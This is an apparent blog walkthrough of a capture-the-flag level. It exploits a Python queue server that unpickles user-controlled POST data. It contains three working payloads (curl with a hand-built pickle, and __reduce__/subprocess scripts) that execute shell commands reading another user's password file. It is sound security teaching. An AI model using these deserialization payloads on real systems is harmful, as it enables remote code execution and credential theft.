Stripe CTF – Level 5

Note: For more information on this series of posts and the CTF exercise, please read the Background section of the first post in this series.

Level 05

Okay, we’re getting closer to the elusive flag. Just two levels left. Let’s see how we might be able to obtain the level06 credentials. Log in as level05 and take a peek at the /levels directory.


Note: You’ll notice that the file attributes for level05 are different than they appeared in previous posts. This is because I didn’t look closely at all of the binaries for each level when I initially set up the server. When I reached level05, I found that even though I had the suid bit set on the “binary”, it is actually a Python script, and the suid bit is ignored for interpreted scripts. So I changed the script to be owned (user and group) by level06, and instead started the server and worker processes as the level06 user on the server side.

This challenge took me by surprise. I really enjoy Python, but I’m not programming in it every day, so when I took my first glance I was a little nervous: no obvious vulnerabilities were popping out at me. This is common in the security analysis field, and like any problem in life, it’s best to start from the beginning and be methodical about what to do next. Here is the code; it’s rather long, so feel free to skim it now and refer back as we walk through it.


#!/usr/bin/env python
import logging
import json
import optparse
import os
import pickle
import random
import re
import string
import sys
import time
import traceback
import urllib

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

LOGGER_NAME = 'queue'
logger = logging.getLogger(LOGGER_NAME)
logger.addHandler(logging.StreamHandler(sys.stderr))

TMPDIR = '/tmp/level05'

class Job(object):
    QUEUE_JOBS = os.path.join(TMPDIR, 'jobs')
    QUEUE_RESULTS = os.path.join(TMPDIR, 'results')

    def __init__(self):
        self.id = self.generate_id()
        self.created = time.time()
        self.started = None
        self.completed = None

    def generate_id(self):
        return ''.join([random.choice(string.ascii_letters) for i in range(20)])

    def job_file(self):
        return os.path.join(self.QUEUE_JOBS, self.id)

    def result_file(self):
        return os.path.join(self.QUEUE_RESULTS, self.id)

    def start(self):
        self.started = time.time()

    def complete(self):
        self.completed = time.time()

class QueueUtils(object):
    @staticmethod
    def deserialize(serialized):
        logger.debug('Deserializing: %r' % serialized)
        parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
        match = parser.match(serialized)
        direction = match.group(1)
        data = match.group(2)
        job = pickle.loads(match.group(3))
        return direction, data, job

    @staticmethod
    def serialize(direction, data, job):
        serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
        logger.debug('Serialized to: %r' % serialized)
        return serialized

    @staticmethod
    def enqueue(type, data, job):
        logger.info('Writing out %s data for job id %s' % (type, job.id))
        if type == 'JOB':
            file = job.job_file()
        elif type == 'RESULT':
            file = job.result_file()
        else:
            raise ValueError('Invalid type %s' % type)

        serialized = QueueUtils.serialize(type, data, job)
        with open(file, 'w') as f:
            f.write(serialized)
            f.close()

class QueueServer(object):
    # Called in server
    def run_job(self, data, job):
        QueueUtils.enqueue('JOB', data, job)
        result = self.wait(job)
        if not result:
            result = (None, 'Job timed out', None)
        return result

    def wait(self, job):
        job_complete = False
        for i in range(10):
            if os.path.exists(job.result_file()):
                logger.debug('Results file %s found' % job.result_file())
                job_complete = True
                break
            else:
                logger.debug('Results file %s does not exist; sleeping' % job.result_file())
                time.sleep(0.2)

        if job_complete:
            f = open(job.result_file())
            result = f.read()
            os.unlink(job.result_file())
            return QueueUtils.deserialize(result)
        else:
            return None

class QueueWorker(object):
    def __init__(self):
        # ensure tmp directories exist
        if not os.path.exists(Job.QUEUE_JOBS):
            os.mkdir(Job.QUEUE_JOBS)
        if not os.path.exists(Job.QUEUE_RESULTS):
            os.mkdir(Job.QUEUE_RESULTS)

    def poll(self):
        while True:
            available_jobs = [os.path.join(Job.QUEUE_JOBS, job) for job in os.listdir(Job.QUEUE_JOBS)]
            for job_file in available_jobs:
                try:
                    self.process(job_file)
                except Exception, e:
                    logger.error('Error processing %s' % job_file)
                    traceback.print_exc()
                else:
                    logger.debug('Successfully processed %s' % job_file)
                finally:
                    os.unlink(job_file)
            if available_jobs:
                logger.info('Processed %d available jobs' % len(available_jobs))
            else:
                time.sleep(1)

    def process(self, job_file):
        serialized = open(job_file).read()
        type, data, job = QueueUtils.deserialize(serialized)

        job.start()
        result_data = self.perform(data)
        job.complete()

        QueueUtils.enqueue('RESULT', result_data, job)

    def perform(self, data):
        return data.upper()

class QueueHttpServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(404)
        self.send_header('Content-type','text/plain')
        self.end_headers()

        output = { 'result' : "Hello there! Try POSTing your payload. I'll be happy to capitalize it for you." }
        self.wfile.write(json.dumps(output))
        self.wfile.close()

    def do_POST(self):
        length = int(self.headers.getheader('content-length'))
        post_data = self.rfile.read(length)
        raw_data = urllib.unquote(post_data)

        queue = QueueServer()
        job = Job()
        type, data, job = queue.run_job(data=raw_data, job=job)
        if job:
            status = 200
            output = { 'result' : data, 'processing_time' : job.completed - job.started, 'queue_time' : time.time() - job.created }
        else:
            status = 504
            output = { 'result' : data }

        self.send_response(status)
        self.send_header('Content-type','text/plain')
        self.end_headers()
        self.wfile.write(json.dumps(output, sort_keys=True, indent=4))
        self.wfile.write('\n')
        self.wfile.close()

def run_server():
    try:
        server = HTTPServer(('127.0.0.1', 9020), QueueHttpServer)
        logger.info('Starting QueueServer')
        server.serve_forever()
    except KeyboardInterrupt:
        logger.info('^C received, shutting down server')
        server.socket.close()

def run_worker():
    worker = QueueWorker()
    worker.poll()

def main():
    parser = optparse.OptionParser("""%prog [options] type""")
    parser.add_option('-v', '--verbosity', help='Verbosity of debugging output.',
                      dest='verbosity', action='count', default=0)
    opts, args = parser.parse_args()
    if opts.verbosity == 1:
        logger.setLevel(logging.INFO)
    elif opts.verbosity >= 2:
        logger.setLevel(logging.DEBUG)

    if len(args) != 1:
        parser.print_help()
        return 1

    if args[0] == 'worker':
        run_worker()
    elif args[0] == 'server':
        run_server()
    else:
        raise ValueError('Invalid type %s' % args[0])

    return 0

if __name__ == '__main__':
    sys.exit(main())

First, I had to step through the code to get a good feel for exactly what was going on. I won’t delve into too much detail about the intended functionality of the program, but in general the script has two primary components – the server process and the worker process.

The server process opens an HTTP listener on port 9020 and handles GET and POST requests. A GET request just returns instructions telling the user to POST some data to be capitalized. When a POST arrives, the server submits a job for the worker process to handle. The worker process constantly polls the “jobs” directory for jobs to process, and when it finds one, it parses the data and writes out the result. Simple enough, but I was still having trouble identifying the vulnerability (it was probably much more obvious to some). I went ahead and ran a test of the program with normal data to get a feel for how it works.
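Something along these lines (the timing values below are illustrative; yours will differ):

$ curl http://localhost:9020 -d 'hello world'
{
    "processing_time": 0.002,
    "queue_time": 0.412,
    "result": "HELLO WORLD"
}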

One thing I noticed right away is that there doesn’t appear to be any input validation on the POST data, so we should have some flexibility there. The next thing I did was trace what happens to the data as it moves through the program. Our data gets passed around between functions and then serialized/deserialized using the pickle API. The line that stood out to me is the regular expression in QueueUtils.deserialize, where our data is about to be parsed:

parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)

This is a simple regular expression that splits the serialized record into three match groups. What I found of interest is that it assumes the “data” field never contains the string “; job: ”. Because the data group is non-greedy, if we include that character sequence in our data, the match for “data” stops at our copy of the marker, and everything after it (our payload, plus the legitimate pickled job the server appended) lands in the final match group instead of the intended “job” string.
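To convince myself, I ran the worker’s regex against a couple of hand-made strings (the EVIL_PICKLE/PICKLED_JOB placeholders are mine, standing in for real pickle streams):

#!/usr/bin/python
import re

parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)

# A normal record: the server's pickled Job lands in group 3, as intended.
normal = "type: JOB; data: hello; job: PICKLED_JOB"
print parser.match(normal).groups()
# -> ('JOB', 'hello', 'PICKLED_JOB')

# A record built from a POST body of '; job: EVIL_PICKLE': the non-greedy
# data group stops at the FIRST '; job: ', so group 3 becomes our payload
# plus the server's trailing pickle.
evil = "type: JOB; data: ; job: EVIL_PICKLE; job: PICKLED_JOB"
print parser.match(evil).groups()
# -> ('JOB', '', 'EVIL_PICKLE; job: PICKLED_JOB')

Conveniently, pickle.loads only reads up to the first stop opcode (‘.’), so the legitimate pickle trailing our payload is simply ignored.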

Okay, so what is supposed to happen with the “job” group? In QueueUtils.deserialize it gets handed straight to pickle.loads; the script assumes this is the same data that pickle.dumps produced in QueueUtils.serialize. That seems to be about the only place in the program where we might trigger some unintended functionality. Researching the pickle module (http://docs.python.org/library/pickle.html) a little more turns up a warning that should pique our interest:

“Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.”

Ahh, but it appears that this program is unpickling data from an “untrusted” source. So let’s figure out how to exploit this. Googling for “python pickle vulnerabilities” leads us to some interesting articles:
http://blog.nelhage.com/2011/03/exploiting-pickle/
http://penturalabs.wordpress.com/2011/03/17/python-cpickle-allows-for-arbitrary-code-execution/
http://nadiana.com/python-pickle-insecure

These articles all discuss ways to exploit the vulnerabilities inherent to pickle.
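The core primitive in all of them is the same: a class can define __reduce__ to tell pickle “reconstruct me by calling this callable with these arguments”, and pickle.loads obliges. A minimal, harmless sketch (my own example, not taken from the articles):

#!/usr/bin/python
import os
import pickle

class Demo(object):
    def __reduce__(self):
        # (callable, args): pickle will invoke os.system('echo pwned')
        # at *unpickling* time.
        return (os.system, ('echo pwned',))

payload = pickle.dumps(Demo())
pickle.loads(payload)  # prints 'pwned': arbitrary command execution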

Okay, so now we know the vulnerability. It seems likely that we can get the server to spit out the level06 password for us. We just need to craft the correct exploit string and pass it in our POST request. I used the articles mentioned above as a guide for generating these exploits.

Getting the exploit string right took quite a bit of fiddling, mostly to get the payload to arrive intact in the POST request. This was one of those trial-and-error experiences that can get frustrating but is worth it in the end. After getting a working string, I also put together a few alternatives based on the pickle exploit examples from my research. Below are the three solutions I came up with.

Solution 1:

 curl http://localhost:9020 -d "; job: $(printf "cos\nsystem\n(S'cat /home/level06/.password > /tmp/level6pw1'\ntR.")" 
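For reference, the argument to printf here is a hand-rolled protocol 0 pickle stream; annotated opcode by opcode (comments mine):

cos\nsystem\n  # 'c' (GLOBAL): push the callable os.system
(              # '(' (MARK): mark the stack
S'cat /home/level06/.password > /tmp/level6pw1'\n  # 'S' (STRING): push the shell command
t              # 't' (TUPLE): bundle everything since the mark into a tuple
R              # 'R' (REDUCE): call os.system('cat ... > /tmp/level6pw1')
.              # '.' (STOP): done; the call's return value becomes the "unpickled" object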

Solution 2:


#!/usr/bin/python
import os
import pickle
import subprocess

class exploit(object):
    def __reduce__(self):
        return (subprocess.Popen,
                (('/bin/sh', '-c',
                  'cat /home/level06/.password > /tmp/level6pw2'),))

job = pickle.dumps(exploit())
mystring = 'curl http://localhost:9020 -d \"; job: $(printf \"' + job + '\")\"'
os.system(mystring)

Solution 3:


#!/usr/bin/python
import pickle
import subprocess
from urllib import urlopen

class exploit(object):
    def __reduce__(self):
        return (subprocess.Popen,
                (('/bin/sh', '-c',
                  'cat /home/level06/.password > /tmp/level6pw3'),))

job = pickle.dumps(exploit())
urlopen('http://localhost:9020', '; job: ' + job)

Here is a screenshot of running the three different exploits.  Notice that they are each handled a little differently, but still produce the same result:

Sure enough, we can validate that all three exploits succeeded and generated the correct result.
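Validation is as simple as reading back the files the exploits dropped; each should contain the level06 password:

$ cat /tmp/level6pw1 /tmp/level6pw2 /tmp/level6pw3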

Conclusion

This was a little more challenging for me as I wasn’t aware of the pickle module and its vulnerabilities prior to this exercise. But that is what is great about these kinds of challenges. They force you to learn something new and research ways to break things that you didn’t know you could break.

Go ahead and save your password, and let’s see if we can finally capture that flag!